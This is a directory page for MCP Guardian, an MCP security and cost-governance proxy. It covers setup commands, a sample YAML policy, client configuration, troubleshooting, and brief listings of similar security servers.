MCP Guardian

v2.3.21Securitystable

Security, cost, and health governance proxy for MCP infrastructure. Enforces YAML-configurable security policies (blocklists, rate limits, token budgets), tracks real token costs via tiktoken, monitors server health with live JSON-RPC probes. Feature

agentic-aiclaude-desktopllm-toolsmcpmodel-context-protocol
Share:
199
Stars
0
Downloads
0
Weekly
0/5

What is MCP Guardian?

MCP Guardian is a Model Context Protocol (MCP) server that allows AI assistants like Claude, Cursor, and VS Code to security, cost, and health governance proxy for mcp infrastructure. enforces yaml-configurable security policies (blocklists, rate limits, token budgets), tracks real token costs via tiktoken, monitor...

Security, cost, and health governance proxy for MCP infrastructure. Enforces YAML-configurable security policies (blocklists, rate limits, token budgets), tracks real token costs via tiktoken, monitors server health with live JSON-RPC probes. Feature

This server falls under the Security and Monitoring & Observability categories on MCPgee, the world's largest MCP server directory with 33,000+ servers.

Features

  • Security, cost, and health governance proxy for MCP infrastr

Use Cases

Enforce security policies, rate limits, and token budgets on MCP infrastructure.
Monitor MCP server health with real-time JSON-RPC probes.
Track token costs and enforce cost governance across MCP usage.
rudraneel93

Maintainer

LicenseMIT License
Languagerust
Versionv2.3.21
UpdatedMay 4, 2026
Statushealthy
Maintenanceactive

Works with

ClaudeOpenAIwindowsmacoslinux

Installation

NPM

npx -y @mcp-guardian/server

Manual Installation

npx -y @mcp-guardian/server

Configuration

Configuration Details

Config File

claude_desktop_config.json

Performance

Response Metrics

Response Time< 200ms
ThroughputMedium

Resource Usage

Memory UsageLow
CPU UsageLow

How to Set Up and Use MCP Guardian

MCP Guardian is a security, cost, and health governance proxy that wraps your existing MCP servers and enforces configurable policies before any tool call reaches them. It blocks dangerous patterns like shell injection, path traversal, and secret exfiltration using YAML-defined rules, tracks real token costs per call, monitors server health via live JSON-RPC probes, and logs every invocation to a local SQLite audit database. Developers and teams running multiple MCP servers use it to add a centralized security layer, enforce rate limits and token budgets, and get a web dashboard view of all MCP activity.

Prerequisites

  • Node.js 18 or higher and npm installed
  • At least one existing MCP server already configured in a supported client (Cursor, Claude Desktop, Cline, or Windsurf)
  • Optional: Ollama running locally (http://127.0.0.1:11434) if you want AI-powered semantic policy features
  • An MCP-compatible client such as Claude Desktop or Cursor
1

Install MCP Guardian globally

Install the @mcp-guardian/server package from npm. This makes the mcp-guardian CLI available system-wide.

npm install -g @mcp-guardian/server@latest
2

Run the onboarding wizard

The onboard command auto-discovers MCP configurations for Cursor, Claude Desktop, Cline, and Windsurf and wraps them with the guardian proxy. The --apply flag writes the changes immediately.

mcp-guardian onboard --apply
3

Start the guardian proxy

Start the MCP Guardian proxy and dashboard. By default the web UI is available at http://localhost:4000.

mcp-guardian start
4

Verify your installation

Run the doctor command to validate that guardian is correctly intercepting your MCP servers and that all components are healthy.

mcp-guardian doctor
5

Configure security policies

Create or edit a YAML policy file to define rules. You can allow/block specific tools, set rate limits (maxCallsPerMinute), and add pattern-based blocklist rules. Point guardian to your policy file with MCP_GUARDIAN_POLICY.

version: '1.0'
policy:
  mode: block
  rules:
    - name: allow-safe-tools
      action: block
      tools:
        allow: [read_file, list_directory]
    - name: rate-limit
      maxCallsPerMinute: 60
6

Review the audit dashboard

Open http://localhost:4000 in your browser to see the MCP Guardian web dashboard. It shows allowed/blocked calls, cost estimates, threat detection, security scoring, and operations metrics.

MCP Guardian Examples

Client configuration

After running mcp-guardian onboard --apply, your MCP client config will be updated automatically. The environment variables below configure the audit DB path, dashboard port, and policy file.

{
  "mcpServers": {
    "guardian": {
      "command": "npx",
      "args": ["-y", "@mcp-guardian/server"],
      "env": {
        "MCP_GUARDIAN_DB_PATH": "~/.mcp-guardian/history.db",
        "DASHBOARD_PORT": "4000",
        "MCP_GUARDIAN_POLICY": "/path/to/policy.yaml",
        "MCP_GUARDIAN_RETENTION_DAYS": "30"
      }
    }
  }
}

Prompts to try

Example prompts that demonstrate MCP Guardian's governance capabilities when used alongside other MCP servers.

- "Show me all MCP tool calls blocked in the last 24 hours"
- "What is the total token cost from MCP calls this week?"
- "Are any of my MCP servers currently unhealthy or unresponsive?"
- "List any suspicious tool call patterns detected today"

Troubleshooting MCP Guardian

mcp-guardian onboard does not detect my Claude Desktop or Cursor config

Ensure your MCP client config files exist at their default locations: ~/Library/Application Support/Claude/claude_desktop_config.json (Claude Desktop on macOS) or ~/.cursor/mcp.json (Cursor). Run mcp-guardian doctor after onboarding to confirm detection.

Dashboard at localhost:4000 is not accessible after mcp-guardian start

Check whether port 4000 is already in use with lsof -i :4000. Set a different port with the DASHBOARD_PORT environment variable before starting. Also ensure DASHBOARD_ENABLED is not set to false.

Policy file changes are not taking effect

MCP Guardian reads the policy file at startup. After editing your YAML policy, restart the guardian process with mcp-guardian start. Confirm the MCP_GUARDIAN_POLICY env var points to the correct absolute path.

Frequently Asked Questions about MCP Guardian

What is MCP Guardian?

MCP Guardian is a Model Context Protocol (MCP) server that security, cost, and health governance proxy for mcp infrastructure. enforces yaml-configurable security policies (blocklists, rate limits, token budgets), tracks real token costs via tiktoken, monitors server health with live json-rpc probes. feature It connects AI assistants to external tools and data sources through a standardized interface.

How do I install MCP Guardian?

Install via npm with the command: npx -y @mcp-guardian/server. Then add the server configuration to your AI client's JSON config file (e.g., claude_desktop_config.json or .cursor/mcp.json).

Which AI clients work with MCP Guardian?

MCP Guardian works with all major MCP-compatible AI clients including Claude Desktop, Claude Code, Cursor, VS Code (GitHub Copilot), Windsurf, and Cline.

Is MCP Guardian free to use?

Yes, MCP Guardian is open source and available under the MIT License license. You can use it freely in both personal and commercial projects.

MCP Guardian Alternatives — Similar Security Servers

Looking for alternatives to MCP Guardian? Here are other popular security servers you can use with Claude, Cursor, and VS Code.

Casdoor

13.6k

An open-source Agent-first Identity and Access Management (IAM) /LLM MCP & agent gateway and auth server with web UI supporting OpenClaw, MCP, OAuth, OIDC, SAML, CAS, LDAP, SCIM, WebAuthn, TOTP, MFA, Face ID, Google Workspace, Azure AD

ghidraMCP

9.0k

An Model Context Protocol server that enables LLMs to autonomously reverse engineer applications by exposing Ghidra's decompilation and analysis tools. It allows AI agents to list code structures, rename methods, and analyze binaries directly through

HexStrike AI

8.9k

HexStrike AI MCP Agents is an advanced MCP server that lets AI agents (Claude, GPT, Copilot, etc.) autonomously run 150+ cybersecurity tools for automated pentesting, vulnerability discovery, bug bounty automation, and security research. Seamlessly b

IDA Pro MCP

8.7k

Enables AI-assisted reverse engineering in IDA Pro by providing tools to analyze binaries, decompile functions, manage comments, search patterns, and interact with the IDA database through natural language.

Anthropic Cybersecurity Skills

6.6k

754 structured cybersecurity skills for AI agents · Mapped to 5 frameworks: MITRE ATT&CK, NIST CSF 2.0, MITRE ATLAS, D3FEND & NIST AI RMF · agentskills.io standard · Works with Claude Code, GitHub Copilot, Codex CLI, Cursor, Gemini CLI & 20+ platform

Hooker

5.1k

🔥🔥 hooker is a Frida-based reverse engineering toolkit for Android. It offers a user-friendly CLI, universal scripts, auto hook generation, memory roaming to detect activities/services, one-click SOCKS5 proxy setup, Frida JustTrustMe, and BoringSSL u

Browse More Security MCP Servers

Explore all security servers available in the MCPgee directory. Each server includes setup guides for Claude, Cursor, and VS Code.

Quick Config Preview

{ "mcpServers": { "mcp-guardian": { "command": "npx", "args": ["-y", "@mcp-guardian/server"] } } }

Add this to your claude_desktop_config.json or .cursor/mcp.json

Read the full setup guide →

Ready to use MCP Guardian?

Browse our complete directory of 33,000+ MCP servers, read setup guides for your editor, and start building with the Model Context Protocol.

33,000+ ServersFree & Open SourceStep-by-Step Guides